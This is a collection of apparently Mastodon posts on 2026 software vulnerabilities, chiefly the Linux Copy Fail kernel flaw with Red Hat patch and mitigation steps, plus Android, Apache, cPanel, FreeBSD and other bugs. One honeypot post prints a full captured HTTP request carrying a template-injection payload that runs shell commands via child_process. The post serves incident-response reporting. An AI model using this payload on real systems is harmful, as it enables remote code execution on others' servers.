Une très bonne synthèse sur la faille CopyFail impactant le noyau Linux : historique de la faille, mécanisme d'exploitation, gestion érratique de la divulgation, mitigation - par Linuxtricks #Infosec #Linux https://www.linuxtricks.fr/news/10-logiciels-libres/600-copy-fail-cve-2026-31431-synthese-technique-sur-cette-faille-linux/

#CopyFail **UPDATE 2025-05-05:** Red Hat has released the kernel updates for Red Hat Enterprise Linux 9 and 10. So if you followed the steps I described in this thread, you can now simply do

dnf update

on affected machines to get the new kernel and do a

grubby --update-kernel=ALL --remove-args='initcall_blacklist=algif_aead_init'

to remove the mitigation described in this post, before you finish the process with a

reboot

to switch to the fixed kernel.

https://access.redhat.com/security/cve/cve-2026-31431

NicFab Newsletter #19 is out.

This week:
→ EDPB marks 10 years of GDPR
→ AI Act trilogue stalls — high-risk rules still set for 2 August 2026
→ EU Age Verification App found vulnerable hours after launch
→ First European standard on trusted data transactions (EN 18235-1:2026)
→ CopyFail (CVE-2026-31431) added to CISA KEV
→ Minnesota first US state to ban nudification apps

https://www.nicfab.eu/en/newsletter-issues/2026-05-05-issue-19/

#Privacy #DataProtection #AIAct #Cybersecurity #AI

Red Hat product updates to copy fail available https://access.redhat.com/security/cve/cve-2026-31431

#cve202631431 #CopyFail #RedHat

Kritische #Kernel #Lücke bedroht zahlreiche #Linux Systeme - #fosstopia

#IT #Security #Forscher haben eine schwere #Schwachstelle im #Linux_Kernel offengelegt (CVE-2026-31431). Die Lücke trägt den Namen Copy Fail und erlaubt lokalen Nutzern den Zugriff auf höchste Systemrechte (root). Angreifer können gezielt vier Bytes in den Seitencache beliebiger Dateien schreiben und so die Kontrolle über ein System übernehmen...

https://fosstopia.de/kritische-kernel-lucke-26/

Oh hey, RHEL released patches for Copy Fail!

https://access.redhat.com/security/cve/cve-2026-31431

#CopyFail #RHEL #PatchesFinally

CVE-2026-31431 #CopyFail shows that #LLM-assisted #cybersecurity research is:
1. Already there and massively impactful without #mythos.
2. Digestible by current governance systems of responsible disclosure.
3. Way more realistic than agents discovering, deploying and scaling exploits autonomously.
Details: https://xint.io/blog/copy-fail-linux-distributions

AlmaLinux 10.2 Beta is now live!

The release team of AlmaLinux, which is a free binary-compatible alternative to a commercial Linux distribution, Red Hat Enterprise Linux, has just released the beta version of the upcoming point release, which is AlmaLinux v10.2.

This beta version of AlmaLinux brings many improvements over the current version, which is version v10.1. The version is available for the following architectures listed:

• Intel/AMD (x86_64)
• Intel/AMD (x86_64_v2)
• Intel/AMD 32-bit (i686) (userspace only, no installation)
• ARM64 (aarch64)
• IBM PowerPC (ppc64le)
• IBM Z (s390x)

However, this beta version of AlmaLinux is not a production release, and is not guaranteed to be stable, especially when it comes to production installations. For users who rely on stability, you’ll have to wait until the official release. If you are curious about this beta version, and you intend to test and to report bugs and issues, you can download the beta version here.

AlmaLinux 10.2 brings i686 userspace packages to enable legacy 32-bit software, CI pipelines, and containerized workloads for users who rely on them in their workflow. It also presents you with updated toolsets and packages, such as the updated MariaDB 11.8, PHP 8.4, and Python 3.14. Security updates have also been provided, such as OpenSSL, Keylime, and SELinux policies, to enhance your computer’s security and to reduce attack vectors.

Also, a severe vulnerability that was left unnoticed since 2017, called Copy Fail (CVE-2026-31431) that exposed a flaw in authencesn, has been patched in this version of AlmaLinux, along with versions v10.x, v9.x, and v8.x.

You can learn more about this beta version here.

@mttaggart https://blog.feistel.party/2026/04/30/deny-alg-socket-to-containers-with-selinux-to-mitigate-cve-2026-31431.html

Not sure if this helps

Presenting, for absolutely no reason at all, CVE-2026-31431 as a 587-byte x86_64 static ELF:
https://github.com/Rat5ak/CVE-2026-31431-CopyFail-static-ELF--POC

Critical Android Zero-Click Vulnerability CVE-2026-0073 Allows Remote Shell Access Without User Interaction
#CyberSecurity
https://securebulletin.com/critical-android-zero-click-vulnerability-cve-2026-0073-allows-remote-shell-access-without-user-interaction/

Actualiza tu Android ya: este fallo permite atacar el móvil sin que pulses nada 👇
https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/
#Ciberseguridad #Seguridad #Privacidad 🔏

OpenSSL's "0 means fail and 1 means success and oh yeah -1 also means fail" APIs have been causing bugs for decades.

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

Today we are disclosing CVE-2026-0073:

A critical no-interaction proximal/adjacent remote code execution vulnerability in adbd's ADB-over-TCP authentication path.

Full technical write-up + exploit flow:

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

Barguest Research Group found a critical no-interaction remote RCE in Android's Wireless Debugging ADB functionality.

https://barghest.asia/blog/cve-2026-0073-adb-tls-auth-bypass/

#android #adb #CVE #wirelessdebug #RCE #authbypass

CVE-2026-0073 affects Android’s System component and it can be exploited without any user interaction. https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android-2/

La importancia de las actualizaciones de seguridad en los sistemas operativos en teléfonos móviles que en realidad son pequeños ordenadores ⚠️ 📱 👾

Actualiza tu Android ya: este fallo permite atacar el móvil sin que pulses nada

https://www.adslzone.net/noticias/moviles/parche-seguridad-android-vulnerabilidad-cve-2026-0073/

Critical Apache HTTP Server 2.4.67 Patches RCE Flaw CVE-2026-23918 — Upgrade All Servers Immediately
#CyberSecurity
https://securebulletin.com/critical-apache-http-server-2-4-67-patches-rce-flaw-cve-2026-23918-upgrade-all-servers-immediately/

#Apache HTTP Server Vulnerability CVE-2026-23918 Exposes Millions of Servers to Remote Code Execution Attacks.
Anyone running Apache httpd version 2.4.66 or earlier are strongly urged to upgrade immediately!

👇
https://gbhackers.com/apache-http-server-vulnerability-exposes-millions-rce/

Critical Apache HTTP/2 Flaw (CVE-2026-23918) Enables DoS and Potential RCE

https://thehackernews.com/2026/05/critical-apache-http2-flaw-cve-2026.html

Read on HackerWorkspace: https://hackerworkspace.com/article/critical-apache-http-2-flaw-cve-2026-23918-enables-dos-and-potential-rce

Summary of all Apache vulnerabilities: https://www.hackerworkspace.com/article/apache-http-server-2-4-vulnerabilities-the-apache-http-server-project

#cybersecurity #vulnerability #exploit

Falla in cPanel e WHM mette a rischio gli account amministrativi sui server di hosting

@informatica
La pubblicazione di un PoC per la CVE-2026-41940 espone cPanel & WHM e WP Squared a rischi concreti di takeover. L’authentication bypass può compromettere server hosting e siti WordPress. Analisi tecnica, impatti e contromisure per

Über 40.000 Server durch Zero-Day-Lücke in cPanel kompromittiert. Die Schwachstelle CVE-2026-41940 ermöglicht Angreifern Admin-Zugriff ohne Authentifizierung. #cPanel #Sicherheitslücke https://winfuture.de/news,158509.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia

CVE-2026-41940 in cPanel & WHM under mass exploitation.
550K+ servers potentially exposed → auth bypass → ransomware deployment.
CISA urges immediate patching.

https://www.technadu.com/hackers-mass-exploit-critical-cpanel-vulnerability-may-impact-550000-potentially-vulnerable-servers/627301/

Patched yet?

#Infosec #Vulnerability

📰 Critical MetInfo CMS Vulnerability Under Active Exploitation

🚨 ACTIVE EXPLOITATION! A critical RCE flaw (CVE-2026-29014, CVSS 9.8) in MetInfo CMS is being widely exploited. Unauthenticated attackers can gain full server control. Patch immediately! #CVE #RCE #CyberSecurity #Vulnerability

🔗 https://cyber.netsecops.io

AISLE boasts about their AI tooling and CVE-2026-42511:

"Our autonomous AI system found another critical vulnerability in the FreeBSD DHCP stack - an unauthenticated remote code execution vulnerability with root privileges.

This finding is significant not only because RCE as root is about as severe as it gets, but also because FreeBSD was explicitly included in Anthropic’s Mythos announcement, and Mythos did not identify this issue."

Not sure if it was a good idea to look this closely: CVE-2026-42511 (#freebsd #dhclient) looks awfully similar to CVE-2011-0997 (isc-dhcp).

Seeing exploitation of CVE-2026-33937 but they target the example URI (/api/email/preview) that is only present in the writeup at https://github.com/EQSTLab/CVE-2026-33937

Here is a full request:

POST /api/email/preview HTTP/1.1
Host: x.x.x.x:8080
Connection: close
Content-Length: 585
Content-Type: application/json
User-Agent: Go-http-client/1.1

{"subject":"Interactive RCE","tpl":{"body":[{"escaped":true,"loc":null,"params":[{"data":false,"depth":0,"loc":null,"original":"this","parts":[],"type":"PathExpression"},{"loc":null,"original":1,"type":"NumberLiteral","value":"{},{})) + process.mainModule.require('child_process').execSync('echo __HBSRCE__;id;uname -a;hostname;nproc;echo __HBSRCE___END').toString() //"}],"path":{"data":false,"depth":0,"loc":null,"original":"lookup","parts":["lookup"],"type":"PathExpression"},"strip":{"close":false,"open":false},"type":"MustacheStatement"}],"loc":null,"strip":{},"type":"Program"}}

#dfir #honeypot #infosec #cybersecurity

#WhatsApp Vulnerability CVE-2026-23866 Lets Attackers Leverage Instagram Reels to Execute Malicious URLs:

👇
https://cybersecuritynews.com/whatsapp-vulnerability-leverage-instagram-reels/